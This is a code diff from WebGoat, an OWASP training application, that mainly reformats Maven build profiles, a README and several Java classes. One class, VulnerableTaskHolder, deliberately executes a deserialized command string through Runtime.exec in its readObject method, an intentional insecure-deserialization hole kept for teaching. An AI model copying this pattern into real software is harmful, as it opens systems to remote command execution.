+        <activeByDefault>true</activeByDefault>
+      </activation>
+      <build>
         <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-                <executions>
-                    <execution>
-                        <goals>
-                            <goal>repackage</goal>
-                        </goals>
-                    </execution>
-                </executions>
+          <plugin>
+            <groupId>org.codehaus.mojo</groupId>
+            <artifactId>build-helper-maven-plugin</artifactId>
+            <executions>
+              <execution>
+                <id>reserve-container-port</id>
+                <goals>
+                  <goal>reserve-network-port</goal>
+                </goals>
+                <phase>process-resources</phase>
                 <configuration>
-                    <excludeDevtools>true</excludeDevtools>
-                    <executable>true</executable>
-                    <mainClass>org.owasp.webgoat.server.StartWebGoat</mainClass>
-                    <!-- See http://docs.spring.io/spring-boot/docs/current/reference/html/howto-build.html#howto-extract-specific-libraries-when-an-executable-jar-runs -->
-                    <requiresUnpack>
-                        <dependency>
-                            <groupId>org.asciidoctor</groupId>
-                            <artifactId>asciidoctorj</artifactId>
-                        </dependency>
-                    </requiresUnpack>
+                  <portNames>
+                    <portName>webgoat.port</portName>
+                    <portName>webwolf.port</portName>
+                    <portName>jmxPort</portName>
+                  </portNames>
                 </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.codehaus.mojo</groupId>
-                <artifactId>build-helper-maven-plugin</artifactId>
-                <executions>
-                    <execution>
-                        <id>add-integration-test-source-as-test-sources</id>
-                        <phase>generate-test-sources</phase>
-                        <goals>
-                            <goal>add-test-source</goal>
-                        </goals>
-                        <configuration>
-                            <sources>
-                                <source>src/it/java</source>
-                            </sources>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-failsafe-plugin</artifactId>
+              </execution>
+            </executions>
+          </plugin>
+          <plugin>
+            <groupId>com.bazaarvoice.maven.plugins</groupId>
+            <artifactId>process-exec-maven-plugin</artifactId>
+            <version>0.9</version>
+            <executions>
+              <execution>
+                <id>start-jar</id>
+                <goals>
+                  <goal>start</goal>
+                </goals>
+                <phase>pre-integration-test</phase>
                 <configuration>
-                    <systemPropertyVariables>
-                        <logback.configurationFile>${basedir}/src/test/resources/logback-test.xml</logback.configurationFile>
-                    </systemPropertyVariables>
-                    <argLine>-Xmx512m -Dwebgoatport=${webgoat.port} -Dwebwolfport=${webwolf.port}</argLine>
-                    <includes>org/owasp/webgoat/*Test</includes>
+                  <workingDir>${project.build.directory}</workingDir>
+                  <arguments>
+                    <argument>java</argument>
+                    <argument>-jar</argument>
+                    <argument>-Dlogging.pattern.console=</argument>
+                    <argument>-Dspring.main.banner-mode=off</argument>
+                    <argument>-Dspring.datasource.url=jdbc:hsqldb:file:${java.io.tmpdir}/webgoat</argument>
+                    <argument>-Dwebgoat.port=${webgoat.port}</argument>
+                    <argument>-Dwebwolf.port=${webwolf.port}</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.lang=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.util=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.lang.reflect=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.text=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.desktop/java.beans=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.desktop/java.awt.font=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/sun.nio.ch=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.io=ALL-UNNAMED</argument>
+                    <argument>--add-opens</argument>
+                    <argument>java.base/java.util=ALL-UNNAMED</argument>
+                    <argument>${project.build.directory}/webgoat-${project.version}.jar</argument>
+                  </arguments>
+                  <waitForInterrupt>false</waitForInterrupt>
+                  <healthcheckUrl>http://localhost:${webgoat.port}/WebGoat/</healthcheckUrl>
                 </configuration>
-                <executions>
-                    <execution>
-                        <id>integration-test</id>
-                        <goals>
-                            <goal>integration-test</goal>
-                        </goals>
-                    </execution>
-                    <execution>
-                        <id>verify</id>
-                        <goals>
-                            <goal>verify</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>${maven-surefire-plugin.version}</version>
-                <configuration>
-                    <argLine>
-                        --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED
-                    </argLine>
-                    <excludes>
-                        <exclude>**/*IntegrationTest.java</exclude>
-                        <exclude>src/it/java</exclude>
-                        <exclude>org/owasp/webgoat/*Test</exclude>
-                    </excludes>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-checkstyle-plugin</artifactId>
-                <version>${checkstyle.version}</version>
-                <configuration>
-                    <encoding>UTF-8</encoding>
-                    <consoleOutput>true</consoleOutput>
-                    <failsOnError>true</failsOnError>
-                    <configLocation>config/checkstyle/checkstyle.xml</configLocation>
-                    <suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation>
-                    <suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-enforcer-plugin</artifactId>
-                <version>3.0.0</version>
-                <executions>
-                    <execution>
-                        <id>restrict-log4j-versions</id>
-                        <phase>validate</phase>
-                        <goals>
-                            <goal>enforce</goal>
-                        </goals>
-                        <configuration>
-                            <rules>
-                                <bannedDependencies>
-                                    <excludes combine.children="append">
-                                        <exclude>org.apache.logging.log4j:log4j-core</exclude>
-                                    </excludes>
-                                </bannedDependencies>
-                            </rules>
-                            <fail>true</fail>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <configuration>
-                    <source>17</source>
-                    <target>17</target>
-                </configuration>
-            </plugin>
+              </execution>
+              <execution>
+                <id>stop-jar-process</id>
+                <goals>
+                  <goal>stop-all</goal>
+                </goals>
+                <phase>post-integration-test</phase>
+              </execution>
+            </executions>
+          </plugin>
         </plugins>
-    </build>
-
-    <repositories>
-        <repository>
-            <id>central</id>
-            <url>https://repo.maven.apache.org/maven2</url>
-            <snapshots>
-                <enabled>false</enabled>
-            </snapshots>
-        </repository>
-    </repositories>
-    <pluginRepositories>
-        <pluginRepository>
-            <id>central</id>
-            <url>https://repo.maven.apache.org/maven2</url>
-            <snapshots>
-                <enabled>false</enabled>
-            </snapshots>
-        </pluginRepository>
-    </pluginRepositories>
+      </build>
+    </profile>
+    <profile>
+      <id>owasp</id>
+      <activation>
+        <activeByDefault>false</activeByDefault>
+      </activation>
+      <build>
+        <plugins>
+          <plugin>
+            <groupId>org.owasp</groupId>
+            <artifactId>dependency-check-maven</artifactId>
+            <version>6.5.1</version>
+            <configuration>
+              <failBuildOnCVSS>7</failBuildOnCVSS>
+              <skipProvidedScope>false</skipProvidedScope>
+              <skipRuntimeScope>false</skipRuntimeScope>
+              <suppressionFiles>
+                <!--suppress UnresolvedMavenProperty -->
+                <suppressionFile>${maven.multiModuleProjectDirectory}/config/dependency-check/project-suppression.xml</suppressionFile>
+              </suppressionFiles>
+            </configuration>
+            <executions>
+              <execution>
+                <goals>
+                  <goal>check</goal>
+                </goals>
+              </execution>
+            </executions>
+          </plugin>
+        </plugins>
+      </build>
+    </profile>
+  </profiles>
 
 </project>
diff --git a/robot/README.md b/robot/README.md
index 7acf94023..5ed805c9f 100644
--- a/robot/README.md
+++ b/robot/README.md
@@ -2,17 +2,18 @@
 
 ## Install Chromedriver on Mac OS
 
-    brew install cask chromedriver
-    chromedriver --version
+        brew install cask chromedriver
+        chromedriver --version
 
 Then see security settings and allow the file to run
 
 ## Install
 
-    pip3 install virtualenv --user
-    python3 -m virtualenv .venv
-    source .venv/bin/activate
-    pip install robotframework
-    pip install robotframework-SeleniumLibrary
-    pip install webdriver-manager
-    robot --variable HEADLESS:"0" --variable ENDPOINT:"http://127.0.0.1:8080/WebGoat" goat.robot
+        pip3 install virtualenv --user
+        python3 -m virtualenv .venv
+        source .venv/bin/activate
+        pip install robotframework
+        pip install robotframework-SeleniumLibrary
+        pip install webdriver-manager
+        robot --variable HEADLESS:"0" --variable ENDPOINT:"http://127.0.0.1:8080/WebGoat" goat.robot
+
diff --git a/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java b/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
index 3dccbb916..98c37a64e 100644
--- a/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
+++ b/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
@@ -1,74 +1,76 @@
 package org.dummy.insecure.framework;
 
-import lombok.extern.slf4j.Slf4j;
-
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStreamReader;
 import java.io.ObjectInputStream;
 import java.io.Serializable;
 import java.time.LocalDateTime;
+import lombok.extern.slf4j.Slf4j;
 
 @Slf4j
-//TODO move back to lesson
+// TODO move back to lesson
 public class VulnerableTaskHolder implements Serializable {
 
-	private static final long serialVersionUID = 2;
+  private static final long serialVersionUID = 2;
 
-	private String taskName;
-	private String taskAction;
-	private LocalDateTime requestedExecutionTime;
-	
-	public VulnerableTaskHolder(String taskName, String taskAction) {
-		super();
-		this.taskName = taskName;
-		this.taskAction = taskAction;
-		this.requestedExecutionTime = LocalDateTime.now();
-	}
-	
-	@Override
-	public String toString() {
-		return "VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="
-				+ requestedExecutionTime + "]";
-	}
+  private String taskName;
+  private String taskAction;
+  private LocalDateTime requestedExecutionTime;
 
-	/**
-	 * Execute a task when de-serializing a saved or received object.
-	 * @author stupid develop
-	 */
-	private void readObject( ObjectInputStream stream ) throws Exception {
-        //unserialize data so taskName and taskAction are available
-		stream.defaultReadObject();
-		
-		//do something with the data
-		log.info("restoring task: {}", taskName);
-		log.info("restoring time: {}", requestedExecutionTime);
-		
-		if (requestedExecutionTime!=null && 
-				(requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
-				|| requestedExecutionTime.isAfter(LocalDateTime.now()))) {
-			//do nothing is the time is not within 10 minutes after the object has been created
-			log.debug(this.toString());
-			throw new IllegalArgumentException("outdated");
-		}
-		
-		//condition is here to prevent you from destroying the goat altogether
-		if ((taskAction.startsWith("sleep")||taskAction.startsWith("ping"))
-				&& taskAction.length() < 22) {
-		log.info("about to execute: {}", taskAction);
-		try {
-            Process p = Runtime.getRuntime().exec(taskAction);
-            BufferedReader in = new BufferedReader(
-                                new InputStreamReader(p.getInputStream()));
-            String line = null;
-            while ((line = in.readLine()) != null) {
-                log.info(line);
-            }
-        } catch (IOException e) {
-            log.error("IO Exception", e);
-        }
-		}
-       
+  public VulnerableTaskHolder(String taskName, String taskAction) {
+    super();
+    this.taskName = taskName;
+    this.taskAction = taskAction;
+    this.requestedExecutionTime = LocalDateTime.now();
+  }
+
+  @Override
+  public String toString() {
+    return "VulnerableTaskHolder [taskName="
+        + taskName
+        + ", taskAction="
+        + taskAction
+        + ", requestedExecutionTime="
+        + requestedExecutionTime
+        + "]";
+  }
+
+  /**
+   * Execute a task when de-serializing a saved or received object.
+   *
+   * @author stupid develop
+   */
+  private void readObject(ObjectInputStream stream) throws Exception {
+    // unserialize data so taskName and taskAction are available
+    stream.defaultReadObject();
+
+    // do something with the data
+    log.info("restoring task: {}", taskName);
+    log.info("restoring time: {}", requestedExecutionTime);
+
+    if (requestedExecutionTime != null
+        && (requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
+            || requestedExecutionTime.isAfter(LocalDateTime.now()))) {
+      // do nothing is the time is not within 10 minutes after the object has been created
+      log.debug(this.toString());
+      throw new IllegalArgumentException("outdated");
     }
-	
+
+    // condition is here to prevent you from destroying the goat altogether
+    if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
+        && taskAction.length() < 22) {
+      log.info("about to execute: {}", taskAction);
+      try {
+        Process p = Runtime.getRuntime().exec(taskAction);
+        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
+        String line = null;
+        while ((line = in.readLine()) != null) {
+          log.info(line);
+        }
+      } catch (IOException e) {
+        log.error("IO Exception", e);
+      }
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java b/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
index 67b0cf977..1ed96e146 100644
--- a/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
+++ b/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
@@ -1,59 +1,59 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
  * for free software projects.
  */
-
 package org.owasp.webgoat.container;
 
-import org.springframework.security.core.AuthenticationException;
-import org.springframework.security.web.authentication.LoginUrlAuthenticationEntryPoint;
-
+import java.io.IOException;
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-import java.io.IOException;
+import org.springframework.security.core.AuthenticationException;
+import org.springframework.security.web.authentication.LoginUrlAuthenticationEntryPoint;
 
 /**
- * <p>AjaxAuthenticationEntryPoint class.</p>
+ * AjaxAuthenticationEntryPoint class.
  *
  * @author zupzup
  */
-
 public class AjaxAuthenticationEntryPoint extends LoginUrlAuthenticationEntryPoint {
-    public AjaxAuthenticationEntryPoint(String loginFormUrl) {
-        super(loginFormUrl);
-    }
+  public AjaxAuthenticationEntryPoint(String loginFormUrl) {
+    super(loginFormUrl);
+  }
 
-    @Override
-    public void commence(HttpServletRequest request, HttpServletResponse response, AuthenticationException authException) throws IOException, ServletException {
-        if (request.getHeader("x-requested-with") != null) {
-            response.sendError(401, authException.getMessage());
-        } else {
-            super.commence(request, response, authException);
-        }
+  @Override
+  public void commence(
+      HttpServletRequest request,
+      HttpServletResponse response,
+      AuthenticationException authException)
+      throws IOException, ServletException {
+    if (request.getHeader("x-requested-with") != null) {
+      response.sendError(401, authException.getMessage());
+    } else {
+      super.commence(request, response, authException);
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
index fddf3e053..723e8cb7c 100644
--- a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
@@ -1,37 +1,47 @@
-
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since December 12, 2015
  */
-
 package org.owasp.webgoat.container;
 
+import static org.asciidoctor.Asciidoctor.Factory.create;
+
 import io.undertow.util.Headers;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.StringWriter;
+import java.util.HashMap;
+import java.util.Locale;
+import java.util.Map;
+import java.util.Set;
+import javax.servlet.http.HttpServletRequest;
 import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
@@ -46,113 +56,117 @@ import org.thymeleaf.templateresolver.FileTemplateResolver;
 import org.thymeleaf.templateresource.ITemplateResource;
 import org.thymeleaf.templateresource.StringTemplateResource;
 
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.InputStreamReader;
-import java.io.StringWriter;
-import java.util.HashMap;
-import java.util.Locale;
-import java.util.Map;
-import java.util.Set;
-
-import static org.asciidoctor.Asciidoctor.Factory.create;
-
 /**
  * Thymeleaf resolver for AsciiDoc used in the lesson, can be used as follows inside a lesson file:
- * <p>
- * <code>
+ *
+ * <p><code>
  * <div th:replace="doc:AccessControlMatrix_plan.adoc"></div>
  * </code>
  */
 @Slf4j
 public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
 
-    private static final Asciidoctor asciidoctor = create();
-    private static final String PREFIX = "doc:";
+  private static final Asciidoctor asciidoctor = create();
+  private static final String PREFIX = "doc:";
 
-    private final Language language;
-    private final ResourceLoader resourceLoader;
+  private final Language language;
+  private final ResourceLoader resourceLoader;
 
-    public AsciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
-        this.resourceLoader = resourceLoader;
-        this.language = language;
-        setResolvablePatterns(Set.of(PREFIX + "*"));
+  public AsciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
+    this.resourceLoader = resourceLoader;
+    this.language = language;
+    setResolvablePatterns(Set.of(PREFIX + "*"));
+  }
+
+  @Override
+  protected ITemplateResource computeTemplateResource(
+      IEngineConfiguration configuration,
+      String ownerTemplate,
+      String template,
+      String resourceName,
+      String characterEncoding,
+      Map<String, Object> templateResolutionAttributes) {
+    var templateName = resourceName.substring(PREFIX.length());
+    log.debug("template used: {}", templateName);
+    try (InputStream is = getInputStream(templateName)) {
+      JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
+      extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+      extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
+      extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
+      extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
+      extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
+      extensionRegistry.inlineMacro("username", UsernameMacro.class);
+
+      StringWriter writer = new StringWriter();
+      asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
+      return new StringTemplateResource(writer.getBuffer().toString());
+    } catch (IOException e) {
+      return new StringTemplateResource(
+          "<div>Unable to find documentation for: " + templateName + " </div>");
     }
+  }
 
-    @Override
-    protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
-        var templateName = resourceName.substring(PREFIX.length());
-        log.debug("template used: {}", templateName);
-        try (InputStream is = getInputStream(templateName)) {
-            JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
-            extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
-            extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
-            extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
-            extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
-            extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
-            extensionRegistry.inlineMacro("username", UsernameMacro.class);
-
-            StringWriter writer = new StringWriter();
-            asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
-            return new StringTemplateResource(writer.getBuffer().toString());
-        } catch (IOException e) {
-            return new StringTemplateResource("<div>Unable to find documentation for: " + templateName + " </div>");
-        }
+  private InputStream getInputStream(String templateName) throws IOException {
+    log.debug("locale: {}", language.getLocale().getLanguage());
+    String computedResourceName =
+        computeResourceName(templateName, language.getLocale().getLanguage());
+    if (resourceLoader
+        .getResource("classpath:/" + computedResourceName)
+        .isReadable() /*isFile()*/) {
+      log.debug("localized file exists");
+      return resourceLoader.getResource("classpath:/" + computedResourceName).getInputStream();
+    } else {
+      log.debug("using english template");
+      return resourceLoader.getResource("classpath:/" + templateName).getInputStream();
     }
+  }
 
-    private InputStream getInputStream(String templateName) throws IOException {
-        log.debug("locale: {}",language.getLocale().getLanguage());
-        String computedResourceName = computeResourceName(templateName, language.getLocale().getLanguage());
-        if (resourceLoader.getResource("classpath:/" + computedResourceName).isReadable()/*isFile()*/) {
-            log.debug("localized file exists");
-            return resourceLoader.getResource("classpath:/" + computedResourceName).getInputStream();
-        } else {
-            log.debug("using english template");
-            return resourceLoader.getResource("classpath:/" + templateName).getInputStream();
-        }
+  private String computeResourceName(String resourceName, String language) {
+    String computedResourceName;
+    if (language.equals("en")) {
+      computedResourceName = resourceName;
+    } else {
+      computedResourceName = resourceName.replace(".adoc", "_".concat(language).concat(".adoc"));
     }
-    private String computeResourceName(String resourceName, String language) {
-        String computedResourceName;
-        if (language.equals("en")) {
-            computedResourceName = resourceName;
-        } else {
-            computedResourceName = resourceName.replace(".adoc", "_".concat(language).concat(".adoc"));
-        }
-        log.debug("computed local file name: {}", computedResourceName);
-        log.debug("file exists: {}",resourceLoader.getResource("classpath:/"+computedResourceName).isReadable());
-        return computedResourceName;
-    }
-
-    private Map<String, Object> createAttributes() {
-        Map<String, Object> attributes = new HashMap<>();
-        attributes.put("source-highlighter", "coderay");
-        attributes.put("backend", "xhtml");
-        attributes.put("lang", determineLanguage());
-        attributes.put("icons", org.asciidoctor.Attributes.FONT_ICONS);
-
-        Map<String, Object> options = new HashMap<>();
-        options.put("attributes", attributes);
-
-        return options;
-    }
-
-    private String determineLanguage() {
-        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
-
-        Locale browserLocale = (Locale) request.getSession().getAttribute(SessionLocaleResolver.LOCALE_SESSION_ATTRIBUTE_NAME);
-        if (null != browserLocale) {
-            log.debug("browser locale {}", browserLocale);
-            return browserLocale.getLanguage();
-        } else {
-            String langHeader = request.getHeader(Headers.ACCEPT_LANGUAGE_STRING);
-            if (null != langHeader) {
-                log.debug("browser locale {}", langHeader);
-                return langHeader.substring(0,2);
-            } else {
-                log.debug("browser default english");
-                return "en";
-            }
-        }
+    log.debug("computed local file name: {}", computedResourceName);
+    log.debug(
+        "file exists: {}",
+        resourceLoader.getResource("classpath:/" + computedResourceName).isReadable());
+    return computedResourceName;
+  }
+
+  private Map<String, Object> createAttributes() {
+    Map<String, Object> attributes = new HashMap<>();
+    attributes.put("source-highlighter", "coderay");
+    attributes.put("backend", "xhtml");
+    attributes.put("lang", determineLanguage());
+    attributes.put("icons", org.asciidoctor.Attributes.FONT_ICONS);
+
+    Map<String, Object> options = new HashMap<>();
+    options.put("attributes", attributes);
+
+    return options;
+  }
+
+  private String determineLanguage() {
+    HttpServletRequest request =
+        ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
+
+    Locale browserLocale =
+        (Locale)
+            request.getSession().getAttribute(SessionLocaleResolver.LOCALE_SESSION_ATTRIBUTE_NAME);
+    if (null != browserLocale) {
+      log.debug("browser locale {}", browserLocale);
+      return browserLocale.getLanguage();
+    } else {
+      String langHeader = request.getHeader(Headers.ACCEPT_LANGUAGE_STRING);
+      if (null != langHeader) {
+        log.debug("browser locale {}", langHeader);
+        return langHeader.substring(0, 2);
+      } else {
+        log.debug("browser default english");
+        return "en";
+      }
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java b/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
index 28559c92a..ef54ff007 100644
--- a/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.container;
 
+import java.util.Map;
+import java.util.function.Function;
+import javax.sql.DataSource;
 import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.flywaydb.core.Flyway;
@@ -11,58 +14,54 @@ import org.springframework.context.annotation.Configuration;
 import org.springframework.context.annotation.Primary;
 import org.springframework.jdbc.datasource.DriverManagerDataSource;
 
-import javax.sql.DataSource;
-import java.util.Map;
-import java.util.function.Function;
-
 @Configuration
 @RequiredArgsConstructor
 @Slf4j
 public class DatabaseConfiguration {
 
-    private final DataSourceProperties properties;
-    private final LessonScanner lessonScanner;
+  private final DataSourceProperties properties;
+  private final LessonScanner lessonScanner;
 
-    @Bean
-    @Primary
-    public DataSource dataSource() {
-        DriverManagerDataSource dataSource = new DriverManagerDataSource();
-        dataSource.setDriverClassName(properties.getDriverClassName());
-        dataSource.setUrl(properties.getUrl());
-        dataSource.setUsername(properties.getUsername());
-        dataSource.setPassword(properties.getPassword());
-        return dataSource;
-    }
+  @Bean
+  @Primary
+  public DataSource dataSource() {
+    DriverManagerDataSource dataSource = new DriverManagerDataSource();
+    dataSource.setDriverClassName(properties.getDriverClassName());
+    dataSource.setUrl(properties.getUrl());
+    dataSource.setUsername(properties.getUsername());
+    dataSource.setPassword(properties.getPassword());
+    return dataSource;
+  }
 
-    /**
-     * Define 2 Flyway instances, 1 for WebGoat itself which it uses for internal storage like users and 1 for lesson
-     * specific tables we use. This way we clean the data in the lesson database quite easily see {@link RestartLessonService#restartLesson()}
-     * for how we clean the lesson related tables.
-     */
-    @Bean(initMethod = "migrate")
-    public Flyway flyWayContainer() {
-        return Flyway
-                .configure()
-                .configuration(Map.of("driver", properties.getDriverClassName()))
-                .dataSource(dataSource())
-                .schemas("container")
-                .locations("db/container")
-                .load();
-    }
+  /**
+   * Define 2 Flyway instances, 1 for WebGoat itself which it uses for internal storage like users
+   * and 1 for lesson specific tables we use. This way we clean the data in the lesson database
+   * quite easily see {@link RestartLessonService#restartLesson()} for how we clean the lesson
+   * related tables.
+   */
+  @Bean(initMethod = "migrate")
+  public Flyway flyWayContainer() {
+    return Flyway.configure()
+        .configuration(Map.of("driver", properties.getDriverClassName()))
+        .dataSource(dataSource())
+        .schemas("container")
+        .locations("db/container")
+        .load();
+  }
 
-    @Bean
-    public Function<String, Flyway> flywayLessons(LessonDataSource lessonDataSource) {
-        return schema -> Flyway
-                .configure()
-                .configuration(Map.of("driver", properties.getDriverClassName()))
-                .schemas(schema)
-                .dataSource(lessonDataSource)
-                .locations("lessons")
-                .load();
-    }
+  @Bean
+  public Function<String, Flyway> flywayLessons(LessonDataSource lessonDataSource) {
+    return schema ->
+        Flyway.configure()
+            .configuration(Map.of("driver", properties.getDriverClassName()))
+            .schemas(schema)
+            .dataSource(lessonDataSource)
+            .locations("lessons")
+            .load();
+  }
 
-    @Bean
-    public LessonDataSource lessonDataSource() {
-        return new LessonDataSource(dataSource());
-    }
+  @Bean
+  public LessonDataSource lessonDataSource() {
+    return new LessonDataSource(dataSource());
+  }
 }
